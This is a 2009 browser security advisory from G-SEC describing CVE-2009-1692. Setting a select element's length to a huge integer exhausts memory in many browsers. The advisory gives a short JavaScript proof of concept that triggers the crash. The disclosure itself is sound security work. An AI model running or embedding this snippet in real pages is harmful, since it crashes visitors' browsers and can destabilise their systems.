Quicklinks: Home Contact

Advisories

G-SEC™ regularly publishes advisories about vulnerabilities that we discovered during our research. G-SEC™ tries to follow responsible disclosure guidelines whenever possible.

More information »

Advisories

One bug to rule them all - IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror,
Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more.


Reference : [GSEC-TZO-44-2009] - One bug to rule them all
CVE : CVE-2009-1692 (created by Apple, this bug has same root cause)
Credit: Thierry Zoller

Affected products :

Patch status :

I. Background

Quoting Wikipedia "ECMAScript is a scripting language, standardized by Ecma International in the ECMA-262 specification and ISO/IEC 16262. The language is widely used on the web, especially in the form of its three best-known dialects, JavaScript, ActionScript, and JScript."

II. Description

Calling the select() method with a large integer, results in continuous allocation of x+n bytes of memory exhausting memory after a while.

The impact varies from null pointer dereference (no more memory,hence crashing the browser) to the reboot of the complete Operation System (Konqueror&Ubuntu).

There had never been a limit specified as to how many html elements the select call should handle, after the report of this Bug, vendors apparently agreed to a limit of 10.000 elements : "Talked to some Apple and Opera guys at the WHATWG social, and we decided this was a good number"

III. Impact

The impact varies from browser to browser and sometimes from OS to OS

IV. Proof of concept

<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}

function go() {
poc(0);
}
</script>

URL: http://www.crashthisthing.com/select.html

Some have not understood what this code does, it does NOT loop as some vendors claimed, it just calls select.lenght() ONCE with a huge integer. One might wonder if over the 9 last years that this bug existed, nobody ever entered a large number in a select.lenght() call.

V. Disclosure timeline

Nothing particular to note.

V. Thanks
Chris Gates, FX, David Raison, Fahem Adam,a team of engineers that recognise themselves, oCert for not helping coordinate this bug.

VI. Media Coverage

Note: All trademarks mentioned herein belong to their respective owners.